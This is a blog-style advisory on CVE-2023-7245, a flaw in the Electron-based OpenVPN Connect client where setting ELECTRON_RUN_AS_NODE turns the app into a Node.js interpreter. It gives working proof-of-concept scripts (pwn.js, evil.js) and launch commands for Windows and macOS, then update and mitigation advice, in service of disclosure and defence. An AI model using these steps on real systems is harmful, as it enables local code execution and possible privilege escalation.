CVE-2023-7245 - How a Node.js Configuration Flaw in OpenVPN Connect Lets Local Users Run Arbitrary Code

In January 2024, a significant local privilege escalation vulnerability—CVE-2023-7245—was discovered in the official OpenVPN Connect client for both Windows and macOS, from versions 3. up to 3.4.3 (Windows) and 3.4.7 (macOS). The vulnerability roots from how OpenVPN Connect leverages the Electron framework. In certain configurations, Electron can inadvertently expose the underlying Node.js runtime to local users, even allowing arbitrary code execution within the OpenVPN Connect application's own privileged context.

This post explains what CVE-2023-7245 is, how it works, how you can exploit it, and where to get more information.

What Is CVE-2023-7245?

OpenVPN Connect is the official client for OpenVPN—the world’s most popular open-source VPN solution. The desktop client is built on Electron, which uses Node.js under the hood.

Node.js mode: Headless, runs scripts like any Node process.

A local environment variable, ELECTRON_RUN_AS_NODE, can tell Electron to drop its GUI and work as raw Node.js. If not properly sandboxed or blocked, any user can exploit this feature to make a packaged app (like OpenVPN Connect) spawn as a Node.js interpreter running with the app’s permissions.

In vulnerable versions of OpenVPN Connect, the designers overlooked this. As a result, any local user can set ELECTRON_RUN_AS_NODE=1 before launching the app. OpenVPN Connect then turns into a Node.js shell, and you can execute JavaScript—effectively running arbitrary code as the OpenVPN Connect user.

Launch OpenVPN Connect from the command line

When Electron boots in Node.js mode, it interprets the first argument (process.argv[1]) as a JS file and executes it.

Supply your own .js file as the argument

This file can contain any JavaScript. Once launched, it has all the capabilities of Node.js inside the context (privileges) of the OpenVPN Connect app.

Exploitation Example

Suppose you want the app to pop a shell (on Windows, that’s cmd.exe). You’d create a file, say, pwn.js:

// pwn.js
const { exec } = require('child_process');
exec('start cmd.exe');

Then, launch OpenVPN Connect as

set ELECTRON_RUN_AS_NODE=1
"C:\Program Files\OpenVPN Connect\OpenVPNConnect.exe" pwn.js

On macOS, it’s similar

export ELECTRON_RUN_AS_NODE=1
/Applications/OpenVPN\ Connect.app/Contents/MacOS/OpenVPN\ Connect pwn.js

Result:
cmd.exe (Windows) or Terminal (macOS) pops up, running with the same permissions as OpenVPN Connect—which may be higher than a regular user (especially if run as Administrator).

Impact

- Local Privilege Escalation: If OpenVPN Connect is set to run as a privileged user (or setuid root on macOS), this could allow full system compromise.
- Persistence & Lateral Movement: Attackers with local file write access could easily exploit this to maintain or escalate access, run any code, or snoop on processes.

If you use OpenVPN Connect on either platform, update immediately.

As a temporary mitigation, avoid running OpenVPN Connect with elevated privileges, and do not allow untrusted local users shell access to your machine.

App developers using Electron should always sanitize the environment and explicitly block the ELECTRON_RUN_AS_NODE variable, especially when shipping production apps.

Technical References

- CVE-2023-7245 entry on NIST NVD
- GitHub Advisory Database
- OpenVPN Release Notes
- Elevation risks in Electron: Understanding ELECTRON_RUN_AS_NODE

Let’s go step-by-step on Windows

1. Get the path to OpenVPN Connect’s executable.
Usually: C:\Program Files\OpenVPN Connect\OpenVPNConnect.exe

2. Write your payload

// save as evil.js
require('child_process').exec('calc.exe');  // Launch calculator as a harmless PoC

3. Run with the vulnerable environment

set ELECTRON_RUN_AS_NODE=1
"C:\Program Files\OpenVPN Connect\OpenVPNConnect.exe" evil.js

You’ll see Calculator pop up—proving arbitrary code execution within the OpenVPN Connect context.

Conclusion

CVE-2023-7245 highlights a classic but dangerous oversight when wrapping widely-used frameworks like Electron/Node.js: every environment variable and execution mode must be explicitly locked down. If you’re an OpenVPN Connect user, update ASAP! If you’re an Electron app author, review your configs and sanitize your environment, or your users might just find themselves at risk the same way.


*Stay safe, and always keep your software updated.*

Timeline

Published on: 02/20/2024 11:15:07 UTC
Last modified on: 08/14/2024 15:35:03 UTC